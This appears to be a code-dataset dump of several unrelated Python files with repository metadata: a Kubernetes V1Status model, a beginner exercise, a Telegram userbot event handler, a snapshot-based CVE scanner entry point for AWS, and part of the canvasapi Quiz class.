APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources # noqa: E501
:return: The api_version of this V1Status. # noqa: E501
:rtype: str
"""
return self._api_version
@api_version.setter
def api_version(self, api_version):
"""Sets the api_version of this V1Status.
APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources # noqa: E501
:param api_version: The api_version of this V1Status. # noqa: E501
:type: str
"""
self._api_version = api_version
@property
def code(self):
"""Gets the code of this V1Status. # noqa: E501
Suggested HTTP return code for this status, 0 if not set. # noqa: E501
:return: The code of this V1Status. # noqa: E501
:rtype: int
"""
return self._code
@code.setter
def code(self, code):
"""Sets the code of this V1Status.
Suggested HTTP return code for this status, 0 if not set. # noqa: E501
:param code: The code of this V1Status. # noqa: E501
:type: int
"""
self._code = code
@property
def details(self):
"""Gets the details of this V1Status. # noqa: E501
:return: The details of this V1Status. # noqa: E501
:rtype: V1StatusDetails
"""
return self._details
@details.setter
def details(self, details):
"""Sets the details of this V1Status.
:param details: The details of this V1Status. # noqa: E501
:type: V1StatusDetails
"""
self._details = details
@property
def kind(self):
"""Gets the kind of this V1Status. # noqa: E501
Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds # noqa: E501
:return: The kind of this V1Status. # noqa: E501
:rtype: str
"""
return self._kind
@kind.setter
def kind(self, kind):
"""Sets the kind of this V1Status.
Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds # noqa: E501
:param kind: The kind of this V1Status. # noqa: E501
:type: str
"""
self._kind = kind
@property
def message(self):
"""Gets the message of this V1Status. # noqa: E501
A human-readable description of the status of this operation. # noqa: E501
:return: The message of this V1Status. # noqa: E501
:rtype: str
"""
return self._message
@message.setter
def message(self, message):
"""Sets the message of this V1Status.
A human-readable description of the status of this operation. # noqa: E501
:param message: The message of this V1Status. # noqa: E501
:type: str
"""
self._message = message
@property
def metadata(self):
"""Gets the metadata of this V1Status. # noqa: E501
:return: The metadata of this V1Status. # noqa: E501
:rtype: V1ListMeta
"""
return self._metadata
@metadata.setter
def metadata(self, metadata):
"""Sets the metadata of this V1Status.
:param metadata: The metadata of this V1Status. # noqa: E501
:type: V1ListMeta
"""
self._metadata = metadata
@property
def reason(self):
"""Gets the reason of this V1Status. # noqa: E501
A machine-readable description of why this operation is in the \"Failure\" status. If this value is empty there is no information available. A Reason clarifies an HTTP status code but does not override it. # noqa: E501
:return: The reason of this V1Status. # noqa: E501
:rtype: str
"""
return self._reason
@reason.setter
def reason(self, reason):
"""Sets the reason of this V1Status.
A machine-readable description of why this operation is in the \"Failure\" status. If this value is empty there is no information available. A Reason clarifies an HTTP status code but does not override it. # noqa: E501
:param reason: The reason of this V1Status. # noqa: E501
:type: str
"""
self._reason = reason
@property
def status(self):
"""Gets the status of this V1Status. # noqa: E501
Status of the operation. One of: \"Success\" or \"Failure\". More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#spec-and-status # noqa: E501
:return: The status of this V1Status. # noqa: E501
:rtype: str
"""
return self._status
@status.setter
def status(self, status):
"""Sets the status of this V1Status.
Status of the operation. One of: \"Success\" or \"Failure\". More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#spec-and-status # noqa: E501
:param status: The status of this V1Status. # noqa: E501
:type: str
"""
self._status = status
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, V1Status):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, V1Status):
return True
return self.to_dict() != other.to_dict()
| 31.952381 | 312 | 0.60765 |
import pprint
import re
import six
from kubernetes_asyncio.client.configuration import Configuration
class V1Status(object):
openapi_types = {
'api_version': 'str',
'code': 'int',
'details': 'V1StatusDetails',
'kind': 'str',
'message': 'str',
'metadata': 'V1ListMeta',
'reason': 'str',
'status': 'str'
}
attribute_map = {
'api_version': 'apiVersion',
'code': 'code',
'details': 'details',
'kind': 'kind',
'message': 'message',
'metadata': 'metadata',
'reason': 'reason',
'status': 'status'
}
def __init__(self, api_version=None, code=None, details=None, kind=None, message=None, metadata=None, reason=None, status=None, local_vars_configuration=None):
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._api_version = None
self._code = None
self._details = None
self._kind = None
self._message = None
self._metadata = None
self._reason = None
self._status = None
self.discriminator = None
if api_version is not None:
self.api_version = api_version
if code is not None:
self.code = code
if details is not None:
self.details = details
if kind is not None:
self.kind = kind
if message is not None:
self.message = message
if metadata is not None:
self.metadata = metadata
if reason is not None:
self.reason = reason
if status is not None:
self.status = status
@property
def api_version(self):
return self._api_version
@api_version.setter
def api_version(self, api_version):
self._api_version = api_version
@property
def code(self):
return self._code
@code.setter
def code(self, code):
self._code = code
@property
def details(self):
return self._details
@details.setter
def details(self, details):
self._details = details
@property
def kind(self):
return self._kind
@kind.setter
def kind(self, kind):
self._kind = kind
@property
def message(self):
return self._message
@message.setter
def message(self, message):
self._message = message
@property
def metadata(self):
return self._metadata
@metadata.setter
def metadata(self, metadata):
self._metadata = metadata
@property
def reason(self):
return self._reason
@reason.setter
def reason(self, reason):
self._reason = reason
@property
def status(self):
return self._status
@status.setter
def status(self, status):
self._status = status
def to_dict(self):
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
return pprint.pformat(self.to_dict())
def __repr__(self):
return self.to_str()
def __eq__(self, other):
if not isinstance(other, V1Status):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
if not isinstance(other, V1Status):
return True
return self.to_dict() != other.to_dict()
| true | true |
1c3070b018da55c9532e5a2ff75d604d17697ddf | 296 | py | Python | challenges/3.4.Strictly_Less_Than_Operator/main.py | pradeepsaiu/python-coding-challenges | b435ab650d85de267eeaa31a55ff77ef5dbff86b | [
"BSD-3-Clause"
] | 141 | 2017-05-07T00:38:22.000Z | 2022-03-25T10:14:25.000Z | challenges/3.4.Strictly_Less_Than_Operator/main.py | pradeepsaiu/python-coding-challenges | b435ab650d85de267eeaa31a55ff77ef5dbff86b | [
"BSD-3-Clause"
] | 23 | 2017-05-06T23:57:37.000Z | 2018-03-23T19:07:32.000Z | challenges/3.4.Strictly_Less_Than_Operator/main.py | pradeepsaiu/python-coding-challenges | b435ab650d85de267eeaa31a55ff77ef5dbff86b | [
"BSD-3-Clause"
] | 143 | 2017-05-07T09:33:35.000Z | 2022-03-12T21:04:13.000Z | def strictly_less_than(value):
if value : # Change this line
return "Less than 10"
elif value : # Change this line
return "Less than 100"
else:
return "100 or more"
# Change the value 1 below to experiment with different values
print(strictly_less_than(1))
| 26.909091 | 62 | 0.665541 | def strictly_less_than(value):
if value :
return "Less than 10"
elif value :
return "Less than 100"
else:
return "100 or more"
print(strictly_less_than(1))
| true | true |
1c3070c120e8c3dc30d18368bf6e88a29b79e99b | 6,058 | py | Python | userbot/events.py | userbot814/DCLXVI | 4bebc89324f51b93c86a9420df49ac3e3b78f29e | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | userbot/events.py | userbot814/DCLXVI | 4bebc89324f51b93c86a9420df49ac3e3b78f29e | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | userbot/events.py | userbot814/DCLXVI | 4bebc89324f51b93c86a9420df49ac3e3b78f29e | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | # Copyright (C) 2020 TeamDerUntergang.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
""" Olayları yönetmek için UserBot modülü.
UserBot'un ana bileşenlerinden biri. """
import sys
from asyncio import create_subprocess_shell as asyncsubshell
from asyncio import subprocess as asyncsub
from os import remove
from time import gmtime, strftime
from traceback import format_exc
from telethon import events
from userbot import bot, BOTLOG_CHATID, LOGSPAMMER, BLACKLIST
def register(**args):
""" Yeni bir etkinlik kaydedin. """
pattern = args.get('pattern', None)
disable_edited = args.get('disable_edited', False)
ignore_unsafe = args.get('ignore_unsafe', False)
unsafe_pattern = r'^[^/!#@\$A-Za-z]'
groups_only = args.get('groups_only', False)
trigger_on_fwd = args.get('trigger_on_fwd', False)
trigger_on_inline = args.get('trigger_on_inline', False)
disable_errors = args.get('disable_errors', False)
me = bot.get_me()
uid = me.id
uid not in BLACKLIST
if pattern is not None and not pattern.startswith('(?i)'):
args['pattern'] = '(?i)' + pattern
if "disable_edited" in args:
del args['disable_edited']
if "ignore_unsafe" in args:
del args['ignore_unsafe']
if "groups_only" in args:
del args['groups_only']
if "disable_errors" in args:
del args['disable_errors']
if "trigger_on_fwd" in args:
del args['trigger_on_fwd']
if "trigger_on_inline" in args:
del args['trigger_on_inline']
if pattern:
if not ignore_unsafe:
args['pattern'] = pattern.replace('^.', unsafe_pattern, 1)
def decorator(func):
async def wrapper(check):
if not LOGSPAMMER:
send_to = check.chat_id
else:
send_to = BOTLOG_CHATID
if not trigger_on_fwd and check.fwd_from:
return
if check.via_bot_id and not trigger_on_inline:
return
if groups_only and not check.is_group:
await check.respond("`I don't think this is a group.`")
return
try:
if uid not in BLACKLIST:
await func(check)
else:
raise RetardsException()
except events.StopPropagation:
raise events.StopPropagation
except RetardsException:
exit(1)
except KeyboardInterrupt:
pass
except:
if not disable_errors:
date = strftime("%Y-%m-%d %H:%M:%S", gmtime())
text = "**USERBOT ERROR REPORT**\n"
link = "Support chat PM: @NGGDCLXVI"
text += "If you want to, you can report it"
text += f"- just forward this message to {link}.\n"
text += "Nothing is logged except the fact of error and date\n"
ftext = "========== DISCLAIMER =========="
ftext += "\nThis file uploaded ONLY here,"
ftext += "\nwe logged only fact of error and date,"
ftext += "\nwe respect your privacy,"
ftext += "\nyou may not report this error if you've"
ftext += "\nany confidential data here, no one will see your data\n"
ftext += "================================\n\n"
ftext += "--------BEGIN USERBOT TRACEBACK LOG--------\n"
ftext += "\nDate: " + date
ftext += "\nChat ID: " + str(check.chat_id)
ftext += "\nSender ID: " + str(check.sender_id)
ftext += "\n\nEvent Trigger:\n"
ftext += str(check.text)
ftext += "\n\nTraceback info:\n"
ftext += str(format_exc())
ftext += "\n\nError text:\n"
ftext += str(sys.exc_info()[1])
ftext += "\n\n--------END USERBOT TRACEBACK LOG--------"
command = "git log --pretty=format:\"%an: %s\" -10"
ftext += "\n\n\nLast 10 commits:\n"
process = await asyncsubshell(command,
stdout=asyncsub.PIPE,
stderr=asyncsub.PIPE)
stdout, stderr = await process.communicate()
result = str(stdout.decode().strip()) \
+ str(stderr.decode().strip())
ftext += result
file = open("crash.log", "w+")
file.write(ftext)
file.close()
if LOGSPAMMER:
await check.client.respond("`Sorry, userbot has crashed..\
\nThe error logs are stored in the userbot's log chat.`")
await check.client.send_file(send_to,
"crash.log",
caption=text)
remove("crash.log")
if not disable_edited:
bot.add_event_handler(wrapper, events.MessageEdited(**args))
bot.add_event_handler(wrapper, events.NewMessage(**args))
return wrapper
return decorator
class RetardsException(Exception):
pass | 37.627329 | 88 | 0.535655 |
import sys
from asyncio import create_subprocess_shell as asyncsubshell
from asyncio import subprocess as asyncsub
from os import remove
from time import gmtime, strftime
from traceback import format_exc
from telethon import events
from userbot import bot, BOTLOG_CHATID, LOGSPAMMER, BLACKLIST
def register(**args):
pattern = args.get('pattern', None)
disable_edited = args.get('disable_edited', False)
ignore_unsafe = args.get('ignore_unsafe', False)
unsafe_pattern = r'^[^/!#@\$A-Za-z]'
groups_only = args.get('groups_only', False)
trigger_on_fwd = args.get('trigger_on_fwd', False)
trigger_on_inline = args.get('trigger_on_inline', False)
disable_errors = args.get('disable_errors', False)
me = bot.get_me()
uid = me.id
uid not in BLACKLIST
if pattern is not None and not pattern.startswith('(?i)'):
args['pattern'] = '(?i)' + pattern
if "disable_edited" in args:
del args['disable_edited']
if "ignore_unsafe" in args:
del args['ignore_unsafe']
if "groups_only" in args:
del args['groups_only']
if "disable_errors" in args:
del args['disable_errors']
if "trigger_on_fwd" in args:
del args['trigger_on_fwd']
if "trigger_on_inline" in args:
del args['trigger_on_inline']
if pattern:
if not ignore_unsafe:
args['pattern'] = pattern.replace('^.', unsafe_pattern, 1)
def decorator(func):
async def wrapper(check):
if not LOGSPAMMER:
send_to = check.chat_id
else:
send_to = BOTLOG_CHATID
if not trigger_on_fwd and check.fwd_from:
return
if check.via_bot_id and not trigger_on_inline:
return
if groups_only and not check.is_group:
await check.respond("`I don't think this is a group.`")
return
try:
if uid not in BLACKLIST:
await func(check)
else:
raise RetardsException()
except events.StopPropagation:
raise events.StopPropagation
except RetardsException:
exit(1)
except KeyboardInterrupt:
pass
except:
if not disable_errors:
date = strftime("%Y-%m-%d %H:%M:%S", gmtime())
text = "**USERBOT ERROR REPORT**\n"
link = "Support chat PM: @NGGDCLXVI"
text += "If you want to, you can report it"
text += f"- just forward this message to {link}.\n"
text += "Nothing is logged except the fact of error and date\n"
ftext = "========== DISCLAIMER =========="
ftext += "\nThis file uploaded ONLY here,"
ftext += "\nwe logged only fact of error and date,"
ftext += "\nwe respect your privacy,"
ftext += "\nyou may not report this error if you've"
ftext += "\nany confidential data here, no one will see your data\n"
ftext += "================================\n\n"
ftext += "--------BEGIN USERBOT TRACEBACK LOG--------\n"
ftext += "\nDate: " + date
ftext += "\nChat ID: " + str(check.chat_id)
ftext += "\nSender ID: " + str(check.sender_id)
ftext += "\n\nEvent Trigger:\n"
ftext += str(check.text)
ftext += "\n\nTraceback info:\n"
ftext += str(format_exc())
ftext += "\n\nError text:\n"
ftext += str(sys.exc_info()[1])
ftext += "\n\n--------END USERBOT TRACEBACK LOG--------"
command = "git log --pretty=format:\"%an: %s\" -10"
ftext += "\n\n\nLast 10 commits:\n"
process = await asyncsubshell(command,
stdout=asyncsub.PIPE,
stderr=asyncsub.PIPE)
stdout, stderr = await process.communicate()
result = str(stdout.decode().strip()) \
+ str(stderr.decode().strip())
ftext += result
file = open("crash.log", "w+")
file.write(ftext)
file.close()
if LOGSPAMMER:
await check.client.respond("`Sorry, userbot has crashed..\
\nThe error logs are stored in the userbot's log chat.`")
await check.client.send_file(send_to,
"crash.log",
caption=text)
remove("crash.log")
if not disable_edited:
bot.add_event_handler(wrapper, events.MessageEdited(**args))
bot.add_event_handler(wrapper, events.NewMessage(**args))
return wrapper
return decorator
class RetardsException(Exception):
pass | true | true |
1c3070e15e0e0e85afeb3600a16c8efd262bddf6 | 2,170 | py | Python | main.py | riddopic/red-detector | 02a7ab59fdfaeabbfb9c641649bfb2618fba5310 | [
"Apache-2.0"
] | 73 | 2020-11-26T17:19:07.000Z | 2022-03-24T15:32:41.000Z | main.py | riddopic/red-detector | 02a7ab59fdfaeabbfb9c641649bfb2618fba5310 | [
"Apache-2.0"
] | 4 | 2020-12-05T01:40:09.000Z | 2021-11-22T14:36:43.000Z | main.py | riddopic/red-detector | 02a7ab59fdfaeabbfb9c641649bfb2618fba5310 | [
"Apache-2.0"
] | 17 | 2020-12-02T06:03:12.000Z | 2022-02-28T21:49:38.000Z | import argparse
from art import text2art
from src.logger import setup_logger
from src.snapper import Snapper
from src.scanner import Scanner
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--region', action='store', dest='region', type=str,
help='region name', required=False)
parser.add_argument('--instance-id', action='store', dest='instance_id', type=str,
help='EC2 instance id', required=False)
parser.add_argument('--keypair', action='store', dest='keypair', type=str,
help='existing key pair name', required=False)
parser.add_argument('--log-level', action='store', dest='log_level', type=str,
help='log level', required=False, default="INFO")
text_art = text2art("RED DETECTOR")
print(text_art)
print(" +++ WELCOME RED-DETECTOR - CVE SCANNER USING VULS +++\n\n")
cmd_args = parser.parse_args()
logger = setup_logger(log_level=cmd_args.log_level)
snapper = Snapper(logger=logger)
if cmd_args.region:
snapper.region = cmd_args.region
else:
snapper.region = snapper.select_region()
snapper.create_client()
if cmd_args.instance_id:
source_volume_id = snapper.get_instance_root_vol(instance_id=cmd_args.instance_id)
else:
source_volume_id = snapper.select_ec2_instance()
volume_id, selected_az, snapshot_id = snapper.snapshot2volume(volume_id=source_volume_id)
scanner = Scanner(logger=logger, region=snapper.region)
if cmd_args.keypair:
scanner.keypair_name = cmd_args.keypair
else:
scanner.keypair_name = scanner.create_keypair(key_name='red_detector_key')
ec2_instance_id, ec2_instance_public_ip, report_service_port = scanner.create_ec2(selected_az=selected_az)
scanner.attach_volume_to_ec2(ec2_instance_id=ec2_instance_id, volume_id=volume_id)
scanner.scan_and_report(ec2_instance_public_ip=ec2_instance_public_ip,
report_service_port=report_service_port, ec2_instance_id=ec2_instance_id,
snapshot_id=snapshot_id)
| 43.4 | 110 | 0.694009 | import argparse
from art import text2art
from src.logger import setup_logger
from src.snapper import Snapper
from src.scanner import Scanner
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--region', action='store', dest='region', type=str,
help='region name', required=False)
parser.add_argument('--instance-id', action='store', dest='instance_id', type=str,
help='EC2 instance id', required=False)
parser.add_argument('--keypair', action='store', dest='keypair', type=str,
help='existing key pair name', required=False)
parser.add_argument('--log-level', action='store', dest='log_level', type=str,
help='log level', required=False, default="INFO")
text_art = text2art("RED DETECTOR")
print(text_art)
print(" +++ WELCOME RED-DETECTOR - CVE SCANNER USING VULS +++\n\n")
cmd_args = parser.parse_args()
logger = setup_logger(log_level=cmd_args.log_level)
snapper = Snapper(logger=logger)
if cmd_args.region:
snapper.region = cmd_args.region
else:
snapper.region = snapper.select_region()
snapper.create_client()
if cmd_args.instance_id:
source_volume_id = snapper.get_instance_root_vol(instance_id=cmd_args.instance_id)
else:
source_volume_id = snapper.select_ec2_instance()
volume_id, selected_az, snapshot_id = snapper.snapshot2volume(volume_id=source_volume_id)
scanner = Scanner(logger=logger, region=snapper.region)
if cmd_args.keypair:
scanner.keypair_name = cmd_args.keypair
else:
scanner.keypair_name = scanner.create_keypair(key_name='red_detector_key')
ec2_instance_id, ec2_instance_public_ip, report_service_port = scanner.create_ec2(selected_az=selected_az)
scanner.attach_volume_to_ec2(ec2_instance_id=ec2_instance_id, volume_id=volume_id)
scanner.scan_and_report(ec2_instance_public_ip=ec2_instance_public_ip,
report_service_port=report_service_port, ec2_instance_id=ec2_instance_id,
snapshot_id=snapshot_id)
| true | true |
1c3071d13f3846e980379db6ae1253b2f439df34 | 1,983 | py | Python | identify-keys.py | TntMatthew/kbdisplay | 3ad974504fd2ecbb3af35f31c9148ef88c03868f | [
"MIT"
] | 1 | 2021-12-28T23:54:48.000Z | 2021-12-28T23:54:48.000Z | identify-keys.py | Tiyenti/kbdisplay | 2e53752caa0223b78607f7daa98c0bffe850098b | [
"MIT"
] | null | null | null | identify-keys.py | Tiyenti/kbdisplay | 2e53752caa0223b78607f7daa98c0bffe850098b | [
"MIT"
] | null | null | null | import subprocess
from enum import Enum
# TODO: Figure out what the rest of these are
class Keycode(Enum):
ESC = 9
ONE = 10
TWO = 11
THREE = 12
FOUR = 13
FIVE = 14
SIX = 15
SEVEN = 16
EIGHT = 17
NINE = 18
ZERO = 19
MINUS = 20
EQUALS = 21
BACKSPACE = 22
TAB = 23
Q = 24
W = 25
E = 26
R = 27
T = 28
Y = 29
U = 30
I = 31
O = 32
P = 33
RIGHTBRACE = 34
LEFTBRACE = 35
ENTER = 36
LEFTCTRL = 37
A = 38
S = 39
D = 40
F = 41
G = 42
H = 43
J = 44
K = 45
L = 46
COLON = 47
QUOTE = 48
GRAVE = 49
LEFTSHIFT = 50
HASH = 51
Z = 52
X = 53
C = 54
V = 55
B = 56
N = 57
M = 58
COMMA = 59
PERIOD = 60
SLASH = 61
RIGHTSHIFT = 62
LEFTALT = 64
SPACE = 65
CAPSLOCK = 66
F1 = 67
F2 = 68
F3 = 69
F4 = 70
F5 = 71
F6 = 72
F7 = 73
F8 = 74
F9 = 75
F10 = 76
SCROLLLOCK = 78
F11 = 95
F12 = 96
RIGHTCTRL = 105
PRTSCN = 107
ALTGR = 108
HOME = 110
UP = 111
PGUP = 112
LEFT = 113
RIGHT = 114
END = 115
DOWN = 116
PGDOWN = 117
INSERT = 118
DELETE = 119
PAUSE = 127
LEFTSUPER = 133
MENU = 135
proc = subprocess.Popen(['xinput', 'test-xi2', '--root'],
stdout=subprocess.PIPE)
inkeypressevent = False
inkeyreleaseevent = False
while True:
line = proc.stdout.readline()
if line != '':
if line == b'EVENT type 2 (KeyPress)\n':
inkeypressevent = True
elif line.startswith(b' detail:') and inkeypressevent:
code = int(line.split()[1])
try:
key = Keycode(code)
print(key, end='')
print(' - ', end='')
print(code)
except ValueError:
print('unknown key - ' + code)
inkeypressevent = False
| 17.094828 | 65 | 0.467978 | import subprocess
from enum import Enum
class Keycode(Enum):
ESC = 9
ONE = 10
TWO = 11
THREE = 12
FOUR = 13
FIVE = 14
SIX = 15
SEVEN = 16
EIGHT = 17
NINE = 18
ZERO = 19
MINUS = 20
EQUALS = 21
BACKSPACE = 22
TAB = 23
Q = 24
W = 25
E = 26
R = 27
T = 28
Y = 29
U = 30
I = 31
O = 32
P = 33
RIGHTBRACE = 34
LEFTBRACE = 35
ENTER = 36
LEFTCTRL = 37
A = 38
S = 39
D = 40
F = 41
G = 42
H = 43
J = 44
K = 45
L = 46
COLON = 47
QUOTE = 48
GRAVE = 49
LEFTSHIFT = 50
HASH = 51
Z = 52
X = 53
C = 54
V = 55
B = 56
N = 57
M = 58
COMMA = 59
PERIOD = 60
SLASH = 61
RIGHTSHIFT = 62
LEFTALT = 64
SPACE = 65
CAPSLOCK = 66
F1 = 67
F2 = 68
F3 = 69
F4 = 70
F5 = 71
F6 = 72
F7 = 73
F8 = 74
F9 = 75
F10 = 76
SCROLLLOCK = 78
F11 = 95
F12 = 96
RIGHTCTRL = 105
PRTSCN = 107
ALTGR = 108
HOME = 110
UP = 111
PGUP = 112
LEFT = 113
RIGHT = 114
END = 115
DOWN = 116
PGDOWN = 117
INSERT = 118
DELETE = 119
PAUSE = 127
LEFTSUPER = 133
MENU = 135
proc = subprocess.Popen(['xinput', 'test-xi2', '--root'],
stdout=subprocess.PIPE)
inkeypressevent = False
inkeyreleaseevent = False
while True:
line = proc.stdout.readline()
if line != '':
if line == b'EVENT type 2 (KeyPress)\n':
inkeypressevent = True
elif line.startswith(b' detail:') and inkeypressevent:
code = int(line.split()[1])
try:
key = Keycode(code)
print(key, end='')
print(' - ', end='')
print(code)
except ValueError:
print('unknown key - ' + code)
inkeypressevent = False
| true | true |
1c3072f1d5729e267d6619856d7905348a976d2e | 33,726 | py | Python | canvasapi/quiz.py | marvic2409/canvasapi | 2e8a151b081ff1c6700d9baaa71f13c2b9bb515c | [
"MIT"
] | null | null | null | canvasapi/quiz.py | marvic2409/canvasapi | 2e8a151b081ff1c6700d9baaa71f13c2b9bb515c | [
"MIT"
] | null | null | null | canvasapi/quiz.py | marvic2409/canvasapi | 2e8a151b081ff1c6700d9baaa71f13c2b9bb515c | [
"MIT"
] | null | null | null | from __future__ import absolute_import, division, print_function, unicode_literals
import warnings
from six import python_2_unicode_compatible
from canvasapi.canvas_object import CanvasObject
from canvasapi.exceptions import RequiredFieldMissing
from canvasapi.paginated_list import PaginatedList
from canvasapi.quiz_group import QuizGroup
from canvasapi.submission import Submission
from canvasapi.user import User
from canvasapi.util import combine_kwargs, obj_or_id
@python_2_unicode_compatible
class Quiz(CanvasObject):
def __str__(self):
return "{} ({})".format(self.title, self.id)
def broadcast_message(self, conversations, **kwargs):
"""
Send a message to unsubmitted or submitted users for the quiz.
:calls: `POST /api/v1/courses/:course_id/quizzes/:id/submission_users/message \
<https://canvas.instructure.com/doc/api/quiz_submission_user_list.html#method.quizzes/quiz_submission_users.message>`_
:param conversations: A dictionary representing a Conversation.
Requires `'body'`, `'recipients'`, and `'subject'` keys.
:type conversations: dict
:returns: True if the message was created, False otherwize
:rtype: bool
"""
required_key_list = ["body", "recipients", "subject"]
required_keys_present = all((x in conversations for x in required_key_list))
if isinstance(conversations, dict) and required_keys_present:
kwargs["conversations"] = conversations
else:
raise RequiredFieldMissing(
(
"conversations must be a dictionary with keys "
"'body', 'recipients', and 'subject'."
)
)
response = self._requester.request(
"POST",
"courses/{}/quizzes/{}/submission_users/message".format(
self.course_id, self.id
),
_kwargs=combine_kwargs(**kwargs),
)
return response.status_code == 201
def create_question(self, **kwargs):
"""
Create a new quiz question for this quiz.
:calls: `POST /api/v1/courses/:course_id/quizzes/:quiz_id/questions \
<https://canvas.instructure.com/doc/api/quiz_questions.html#method.quizzes/quiz_questions.create>`_
:rtype: :class:`canvasapi.quiz.QuizQuestion`
"""
response = self._requester.request(
"POST",
"courses/{}/quizzes/{}/questions".format(self.course_id, self.id),
_kwargs=combine_kwargs(**kwargs),
)
response_json = response.json()
response_json.update({"course_id": self.course_id})
return QuizQuestion(self._requester, response_json)
def create_question_group(self, quiz_groups, **kwargs):
"""
Create a new question group for the given quiz id
:calls: `POST /api/v1/courses/:course_id/quizzes/:quiz_id/groups \
<https://canvas.instructure.com/doc/api/quiz_question_groups.html#method.quizzes/quiz_groups.create>`_
:param quiz_groups: The name, pick count, question points,
and/or assessment question bank id.
All of these parameters are optional, but at least one must exist
(even if empty) to receive a response.
The request expects a list, but will only create 1 question group per request.
:type quiz_groups: list[dict]
:returns: `QuizGroup` object
:rtype: :class:`canvasapi.quiz_group.QuizGroup`
"""
if not isinstance(quiz_groups, list) or not quiz_groups:
raise ValueError("Param `quiz_groups` must be a non-empty list.")
if not isinstance(quiz_groups[0], dict):
raise ValueError("Param `quiz_groups must contain a dictionary")
param_list = [
"name",
"pick_count",
"question_points",
"assessment_question_bank_id",
]
if not any(param in quiz_groups[0] for param in param_list):
raise RequiredFieldMissing("quiz_groups must contain at least 1 parameter.")
kwargs["quiz_groups"] = quiz_groups
response = self._requester.request(
"POST",
"courses/{}/quizzes/{}/groups".format(self.course_id, self.id),
_kwargs=combine_kwargs(**kwargs),
)
response_json = response.json()
response_json["quiz_groups"][0].update({"course_id": self.id})
return QuizGroup(self._requester, response_json.get("quiz_groups")[0])
def create_report(self, report_type, **kwargs):
"""
Create and return a new report for this quiz. If a previously generated report
matches the arguments and is still current (i.e. there have been no new submissions),
it will be returned.
:calls: `POST /api/v1/courses/:course_id/quizzes/:quiz_id/reports \
<https://canvas.instructure.com/doc/api/quiz_reports.html#method.quizzes/quiz_reports.create>`_
:param report_type: The type of report, either student_analysis or item_analysis
:type report_type: str
:returns: `QuizReport` object
:rtype: :class:`canvasapi.quiz.QuizReport`
"""
if report_type not in ["student_analysis", "item_analysis"]:
raise ValueError(
"Param `report_type` must be a either 'student_analysis' or 'item_analysis'"
)
kwargs["quiz_report"] = {"report_type": report_type}
response = self._requester.request(
"POST",
"courses/{}/quizzes/{}/reports".format(self.course_id, self.id),
_kwargs=combine_kwargs(**kwargs),
)
response_json = response.json()
response_json.update({"course_id": self.course_id})
return QuizReport(self._requester, response_json)
def create_submission(self, **kwargs):
"""
Start taking a Quiz by creating a QuizSubmission can be used to answer
questions and submit answers.
:calls: `POST /api/v1/courses/:course_id/quizzes/:quiz_id/submissions \
<https://canvas.instructure.com/doc/api/quiz_submissions.html#method.quizzes/quiz_submissions_api.create>`_
:rtype: :class:`canvasapi.quiz.QuizSubmission`
"""
response = self._requester.request(
"POST",
"courses/{}/quizzes/{}/submissions".format(self.course_id, self.id),
_kwargs=combine_kwargs(**kwargs),
)
response_json = response.json()["quiz_submissions"][0]
response_json.update({"course_id": self.course_id})
return QuizSubmission(self._requester, response_json)
def delete(self, **kwargs):
"""
Delete this quiz.
:calls: `DELETE /api/v1/courses/:course_id/quizzes/:id \
<https://canvas.instructure.com/doc/api/quizzes.html#method.quizzes/quizzes_api.destroy>`_
:rtype: :class:`canvasapi.quiz.Quiz`
"""
response = self._requester.request(
"DELETE",
"courses/{}/quizzes/{}".format(self.course_id, self.id),
_kwargs=combine_kwargs(**kwargs),
)
quiz_json = response.json()
quiz_json.update({"course_id": self.course_id})
return Quiz(self._requester, quiz_json)
def edit(self, **kwargs):
"""
Modify this quiz.
:calls: `PUT /api/v1/courses/:course_id/quizzes/:id \
